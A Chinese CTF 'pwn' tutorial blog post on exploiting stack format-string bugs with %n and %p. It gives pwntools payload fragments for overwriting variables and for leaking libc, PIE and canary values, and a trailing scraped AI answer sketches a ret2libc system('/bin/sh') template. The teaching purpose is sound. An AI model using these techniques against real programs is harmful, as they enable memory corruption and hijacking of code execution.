栈上的格式化字符串漏洞【超详细,七种利用】(pwn入门)

已于 2024-06-06 15:51:06 修改
阅读量2.6k 收藏 30
点赞数 48
CC 4.0 BY-SA版权
分类专栏: pwn 文章标签: 安全 网络安全
于 2024-05-24 21:48:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2402_83422357/article/details/139180404

写在前面:

格式化字符串漏洞由于目前编译器的默认禁止敏感格式控制符,而且容易通过代码审计中发现,所以此类漏洞现在已经极少出现了。

所以格式化字符串漏洞在实际利用过程中现在几乎挖掘不到了,但是在CTF的pwn题中,由于其可以结合其他溢出漏洞利用,还是经常会遇到格式化字符串漏洞的。

格式化字符串漏洞最早被Tymm Twillman在1999年发现,当时并未引起重视。在tf8的一份针对wu-ftpd格式化字符串漏洞实现任意代码执行的漏洞的报告之后(详情可参阅 《黑客攻防技术宝典-系统实战篇》),才让人们意识到它的危害,至此而发现了大量的相关漏洞。

格式化字符串漏洞的产生根源主要源于对用 户输入未进行过滤,这些输入数据都作为数据传递给某些执行格式化操作的函数,如printf,sprintf,vprintf,vprintf。恶意用户 可以使用"%s","%x",“%p”来得到堆栈的数据,甚至可以通过"%n"来对任意地址进行读写,导致任意代码读写。

一般掌握好“%n”和“%p”的利用就差不多了

作用一:

可以改写一个变量的值的大小,比如改写变量x的大小为任意你想要的值

小范围修改:

这里正常来说条件是不可能成立的,因为程序自己已经设定好了x的值为3,但是我们可以通过格式化字符串的漏洞改写变量x的值为5,使这个If条件成立,跳转到welcome这个漏洞函数里面去

依旧是以32位程序为例子

payload = p32(0x804C030) + b'%1c' + b'%4$n'

通过这个payload就可以改写x的值为5,从而使这个If条件成立,跳转到welcome这个漏洞函数里面去

大范围修改:

这个就需要自己去调试和真正理解这个格式化字符串的原理了,这里给出payload

payload = "%{}c".format(str(value)).encode() + b"%n$n"

payload=(b'%'+str(one_gadget>>padding&0xffff).encode()+b'c%n$hn').ljust(padding,b'\x00')

记得加上地址。

其实啊,这个也可以一键修改好你想要的值

就是pwntools小工具里面有这个写好的函数原型可以直接用,填入偏移,数据和地址就可以直接修改好,不过刚开始还是自己理解原理为最好,不要太依赖这个。

作用二:

泄露函数实际的地址

其实格式化字符串漏洞也可以泄露出来函数实际地址,然后根据固定公式,就可以计算出来Libc的基地址,这也是我最近才学习到的新方法,常规的泄露libc基地址的方法可以见我上一篇博客:ret2libc 泄露libc后构造system(‘/bin/sh‘)进行攻击(pwn入门)-优快云博客

脚本如下:

payload =  '.%n$p'
p.sendline(payload)
p.recvuntil('.')
leak = int(p.recv(10),16) - padding

作用三:

泄露pie基地址从而绕过pie保护机制

脚本如下:

payload = '.%n$p'

p.recvuntil('.')
pie_base = int(p.recv(14),16) - padding - base

作用四:

泄露canary从而绕过canary保护机制

脚本如下:

payload = 'aaaa%n$p'

p.sendline(payload)

p.recvuntil('aaaa')

canary = int(p.recvuntil('00'),16)

log.success('canary:' + hex(canary))

作用五:

直接泄露出栈上的数据,如果一些重要的信息比如flag直接放在栈上,那可以直接利用下面payload泄露出来

payload = '%n$s'

作用六:

写地址进栈,来实现读任意地址内存

依旧是32位为例子

payload = <address>%<order>$s
这样就可以尝试读出,adress处对应的值,但是往往不会达到预期的目的,后来查了资料才知道

因为是%s,其遇到\x00就会直接断了,没有想要的输出。更常有的情况就是,会输出一大堆,然后我们想要的地址掺杂在里面,所以可以改进一下,可以加一组标记,然后再去取出来想要,这样也可以来检测是否被\x00截断了。
改进:

payload = <address>@@%<order>$s@@
在使用的时候记得除去 < >

64位的话就是地址放在后面

作用七(刚开始觉得这个不算Pwn入门所以没说):劫持fini_array|劫持got表

可以去看下我朋友写的博客,蛮详细的我就不多说了

【PWN · 格式化字符串|劫持fini_array|劫持got表】[CISCN 2019西南]PWN1-优快云博客

写在最后:

这些就是很基础很基础的入门的运用了,其实真正的比赛往往考察的都是非栈上的格式化字符串漏洞,变量在.bss段或者别的地方,就得利用"四马分肥"和"诸葛连弩"这种精细的攻击手法,一点一点的去修改,还在学习ing......

NodeJS代码审计中常见的漏洞(四)
武天旭的博客
03-02 914
经过漫长时间的迭代更新,内容从一开始的碎片化网罗搜集,到排版与整合划分,再到学习与实践验证,最后摒弃初始,用自己的语言与实践结论通俗的将它展现出来。强化知识技能的同时也为读者带来更好的阅读体验。 本篇介绍了以下代码安全问题: 编号 漏洞 1 敏感信息存储
pwn学习笔记(5)--格式化字符串漏洞(未完全完成)
qq_66013948的博客
03-05 1649
格式化字符串函数可以接收可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数格式化字符串函数格式化字符串[后续参数]
格式化字符串漏洞原理及其利用(附带pwn例题讲解)
WdIg-2023的博客
04-09 9704
格式化字符串漏洞在实际利用过程中现在几乎挖掘不到了,但是在CTF的pwn题中,由于其可以结合其他溢出漏洞利用,还是经常会遇到格式化字符串漏洞的。在我们初识C语言的时候,我们经常会使用到printf这之类的函数,printf函数的第一个参数就是一个格式化字符串,就是程序员可以使用占位符,指定格式,这些占位符用来替代后面的变量或者是数据。简单总结就是说,我们可以在一个字符串中,执行某个位置应该输出怎么样的数据,使用占位符代替,在输出的时候函数会自动按照我们指定的格式,寻找参数并以我们预想的形式输出。
Day 7:格式化字符串漏洞(Format String Vulnerability)
最新发布
blog.boringhex.top
06-25 493
摘要: 格式化字符串漏洞是C语言中高危的安全隐患,由用户可控的格式字符串参数引发(如printf(user_input))。攻击者可利用%x、%n等格式符读取或篡改内存。典型错误包括直接使用用户输入作为格式字符串或未保护的日志记录。规避方法是固定格式字符串(如printf("%s", user_input)),避免用户控制格式。底层原理涉及数据越界访问和%n的任意内存写入。建议开启编译警告并静态分析代码,杜绝此类漏洞。核心原则:永远禁止用户输入作为格式字符串
Pwn 二进制漏洞审计
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
02-28 3997
PWN 二进制漏洞审计
PWN--非格式化字符串漏洞
2302_79542511的博客
10-06 423
最近刷题碰到了非上的格式化字符串漏洞。这类题的特点是格式化字符串不在上,那么就不能用fmt_str工具来任意地址写了,而是必须要自己手搓。那么如何手搓呢?主要是利用%kc和%k$hn(双字节)或者%k$hhn(单字节)。%kc(k是一个整数)的作用是打印k个空字符,这样的话可以控制%k$n写入的值。%k$n的作用是对于第k个参数(必须是指针类型),往其指向的地址写入已打印的字符个数。具体如何操作,请看例题。
PWN-溢出漏洞
qq_42526420的博客
02-27 369
PWN-溢出漏洞 ret2text 信息搜集阶段 checksec re2text弄清楚保护机制 checksec的使用 file ret2text 静态分析 Q:IDA作为静态分析工具怎么可以计算出get_shell的虚拟地址? ​ 大概是因为这个文件没有开启ALSR技术,因此仅仅凭ELF文件本身信息尽可以推断出加载到内存的情况! vullnerable函数中的局部变量buf数组在IDA中给出了其在帧中的位置[ebp-10h],这个建议 有时准有时不准,保险起见这里要经过动态
【Web狗自虐系列2】Pwn入门格式化字符串漏洞
就这样吧
07-24 1173
格式化字符串(Fromat String):在编码过程中,允许编码人员通过特殊的占位符,将相关对应的信息整合或提取的规则字符串格式化字符串包括格式化输入和格式化输出 以printf()为例,第一个参数就是格式化字符串:“字符串 %s, 整数 %d, 浮点数 %f”,然后printf函数会根据这个格式化字符串来解析对应的其他参数%d /// 十进制-输出十进制整数%s /// 字符串-从内存中读取字符串%lx /// 十六进制-输出十六进制数。
Linux pwn入门教程(6)——格式化字符串漏洞
xiaoi123的博客
08-03 2407
作者:Tangerine@SAINTSEC 0x00 printf函数中的漏洞 printf函数族是一个在C编程中比较常用的函数族。通常来说,我们会使用printf([格式化字符串],参数)的形式来进行调用,例如 char s[20] = “Hello world!\n”; printf(“%s”, s); 然而,有时候为了省事也会写成 char s[20] = “Hello wor...
Linux pwn入门教程——格式化字符串漏洞
xiaoi123的博客
07-18 1008
本文作者:Tangerine@SAINTSEC 原文来自:https://bbs.ichunqiu.com/thread-42943-1-1.html 0×00 printf函数中的漏洞printf函数族是一个在C编程中比较常用的函数族。通常来说,我们会使用printf([格式化字符串],参数)的形式来进行调用,例如 然而,有时候为了省事也会写成 事实上,这是一种非常危险的写法。由...
格式化字符串漏洞入门简述(含例子:攻防世界pwn新手题GCfsb)
ins_Digger的博客
10-30 1224
##本文参考的文章有如下的博客(实在太菜,所以花了好长时间去练习,找题,看博客才稍微有一点点明白,其实还是不是特别明白) https://www.freebuf.com/column/207425.html 《黑客攻防技术宝典:系统篇》第四章 格式化字符串漏洞的简单概述 学过 c 语言应该就会知道printf()函数的使用方法,如下图: int main(){ char str[100]; s...
Pwn 学习 fmt_str_level_1_x86 格式化字符串
MrTreebook的博客
09-07 1350
【代码】Pwn 学习 fmt_str_level_1_x86 格式化字符串
格式化字符串漏洞利用
04-14
格式化字符串漏洞利用
pwn-格式化字符串漏洞
苗_的博客
09-07 970
一直想写一篇关于这个漏洞的博客,刚好借着今天刷到buu的【第五空间决赛2019】PWN5这道题来系统讲一下格式化字符串漏洞: (这里这道题还是蛮简单的,主要是去理解这个漏洞的原理,关于该漏洞的难度稍大的题会零开博客讲解) 看一下几个经常用来测试格式化字符串的格式控制符%d 用于读取10进制数值 %x 用于读取16进制数值 (这两个都可以起到泄露信息的作用)%s 用于读取字符串值  即泄露任意地址信息 (%d,%x只能泄露原有的内容,结合%s就可以泄露任意地址的内容) (%s不直接打印中内容,而是通过.
CTF-pwn 技术总结,二进制漏洞挖掘---安全机制绕过
键盘的起始页
04-01 1568
学习linux pwn,linux安全机制的知识是绕不开的。如果能理解这些安全机制的原理以及不懂得如何绕过它们,那么在比赛时将你举步维艰,本节我就总结了所有linux安全机制的基本原理以及具体的绕过方法,希望能帮助一些小萌新更快入门,帮助需要进阶的朋友打好根基。
pwn学习】格式化字符漏洞
Morphy_Amo的博客
12-29 6685
文章目录什么是格式化字符漏洞格式化字符串函数格式化字符串利用泄露内存例题 利用格式化字符串漏洞获取libc基址覆盖内存地址覆盖小数覆盖大数覆盖轮子 什么是格式化字符漏洞 格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。通俗来说,格式化字符串函数就是将计算机内存中表示的数据转化为我们人类可读的字符串格式。几乎所有的 C/C++ 程序都会利用格式化字符串函数来输出信息,调试程序,或者处理字符串。一般来说,格式化字符串利用的时候主要分为三个部分。 格式化字符串
[CTF]PWN--非格式化字符串漏洞
2301_79880752的博客
02-26 2998
一般来说,上的格式化字符串漏洞利用步骤是先泄露地址,包括ELF程序地址和libc地址;然后将需要改写的GOT表地址直接传到上,同时利用%c%n的方法改写入地址,最后就是劫持流程。但是对于BSS段或是堆上格式化字符串,也就是非格式化字符串漏洞,无法直接将想要改写的地址指针放置在上,也就没办法实现任意地址写。本文主要为大家介绍BSS段上的格式化字符串漏洞的解法。
[CTF]PWN--手搓格式化字符串漏洞
2301_79880752的博客
02-19 1589
而是,原来我们修改了的其实是0x7f1与0x7f2里的东西,那后面我们就需要修改0x7f3与0x7f4里的东西,因此我们+2的意思就是将原来的0x7f1+2,修改成0x7f3,这样,我们在修改的时候改的就是0x7f3与0x7f4里的东西了(思路是这样的,一个地址一共八个字节,我们需要将要修改的地址和被修改的地址每两个字节对应的修改,直到最后将所以字节都修改成我们需要的地址。修改最高二位的时候也是一样的,由于里面的地址与libc里面的地址一般都只占6个字节,因此,我们只需要进行三次修改即可。
格式化字符串漏洞
HBohan的博客
10-06 2265
漏洞原理 格式化字符串是一种很常见的漏洞,其产生根源是printf函数设计的缺陷,即printf()函数并不能确定数据参数arg1,arg2…究竟在什么地方结束,也就是说,它不知道参数的个数。它只会根据format中的打印格式的数目依次打印堆中参数format后面地址的内容 格式字符串漏洞发生的条件就是格式字符串要求的参数和实际提供的参数不匹配。 如图所示,执行的命令为printf("%s %d %d %d %x\n",buf, 1, 2, 3),紧随格式化字串后压入上的参数为4个,但格式化字串有五个.
ctfshow pwn入门20
03-19
<think>好的,我现在需要帮助用户找到CTFShow平台上关于PWN入门的题解和教程。首先,用户提到了他们之前做过pwn02和pwn03,参考了相关的引用内容。我得先回忆一下CTFShow的PWN题目的结构,通常入门题会从基础溢出开始,然后逐步引入更多概念,比如格式化字符串漏洞、ROP链构造等。 用户需要的是入门级的教程或题解,所以应该从最基础的题目开始分析。比如pwn01可能是一个简单的溢出,不需要绕过canary或者ASLR。而pwn02可能涉及到一些基础漏洞利用,用户提到他们自己做出了第一道pwn题,可能在解题过程中遇到了环境配置、工具使用的问题,比如如何用pwntools编写exp,如何调试程序。引用1中用户提到踩了很多坑,比如零基础不知道怎么问,这说明教程需要详细步骤,避免跳步。 接下来,pwn03涉及到延迟绑定的知识,引用2中解释了延迟绑定是为了优化动态链接库函数的加载时间,将地址解析推迟到第一次调用。这可能涉及到GOT表和PLT表的利用,比如通过覆盖GOT表项来劫持程序流。题解可能需要介绍这些概念,并给出具体的利用步骤,比如如何泄露libc地址,如何构造payload。 然后,我需要考虑用户可能需要的资源类型。除了具体的题解,他们可能还需要工具使用的教程,比如如何安装和使用pwntools、checksec、ROPgadget等工具。此外,调试技巧也很重要,比如使用gdb的peda插件,如何下断点,查看内存等。 用户的问题可能还涉及到如何搭建实验环境,比如使用Docker配置相同的环境,或者如何获取题目对应的二进制文件和libc版本。这些都是解题过程中常见的步骤,尤其是当题目依赖特定版本的libc时,确定libc版本并计算偏移量是关键步骤。 另外,用户可能需要了解基本的漏洞类型,比如溢出、堆溢出、格式化字符串漏洞等。在入门阶段,溢出是最常见的,所以教程应该详细解释如何覆盖返回地址,如何计算偏移量,如何构造shellcode。如果题目开启了NX保护,就需要使用ROP技术,这时候可能需要介绍如何找到合适的gadgets,如何组合成有效的攻击链。 对于CTFShow的PWN题,可能每个题目都有不同的保护机制,比如NX、Canary、PIE等。题解需要指导如何检查这些保护,并相应调整攻击策略。例如,如果Canary存在,可能需要先泄露canary的值;如果PIE开启,需要先泄露某个地址来计算基址。 用户还可能遇到常见的错误,比如exp在本地运行成功但远程失败,这可能是因为环境差异,比如libc版本不同,或者网络字节序的问题。教程应该提醒注意这些点,并给出解决方法,比如使用Docker容器保持环境一致,或者动态获取远程libc的偏移。 最后,我应该整理一些具体的题解链接或资源,比如优快云的博客、GitHub上的仓库,或者CTFShow的官方WP(如果有的话)。同时,建议用户多练习,从简单题目开始,逐步提升难度,并参与CTF比赛或刷题平台来巩固知识。</think>针对CTFShow平台PWN入门题目的学习路径和资源整理如下: ### 一、基础准备 1. **工具安装** - 安装`pwntools`:Python编写的漏洞利用框架 - 安装`checksec`:检查二进制文件保护机制(如NX、Canary) - 配置`gdb`+`peda`/`gef`:增强调试功能 ```bash pip install pwntools sudo apt install checksec ``` 2. **必要知识** - 溢出原理(覆盖返回地址、构造ROP链) - GOT/PLT表与延迟绑定机制[^2] - Linux系统调用(如`execve("/bin/sh")`) --- ### 二、CTFShow PWN入门题解析 #### 1. **PWN 02(溢出基础)** - **漏洞点**:输入无长度限制导致溢出 - **利用步骤**: 1. 计算偏移量:通过调试确定返回地址的偏移 2. 构造Payload:覆盖返回地址为`system("/bin/sh")`地址 - **关键代码**: ```python from pwn import * p = process('./pwn02') payload = b'A'*偏移 + p32(system_addr) + p32(0) + p32(bin_sh_addr) p.sendline(payload) p.interactive() ``` #### 2. **PWN 03(延迟绑定与GOT表劫持)** - **漏洞点**:格式化字符串漏洞 - **利用步骤**: 1. 泄露libc地址(如`puts`的GOT表项) 2. 计算libc基址与`system`函数地址 3. 覆盖`printf`的GOT表项为`system`地址 4. 触发`printf(input)`实际执行`system(input)` - **调试技巧**: ```bash gdb -q ./pwn03 b *main+0x50 # 在关键函数下断点 ``` --- ### 三、推荐学习资源 1. **文章教程** - [CTF PWN入门:从溢出到ROP](https://zhuanlan.zhihu.com/p/25816426) - [Linux二进制漏洞利用入门](https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/stack-intro/) 2. **实战题目** - CTFShow-PWN题库(搜索“入门”标签) - [pwn.college](https://pwn.college/)(交互式练习平台) 3. **视频课程** - B站《CTF PWN从零到一》系列(工具使用+案例演示) --- ###
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值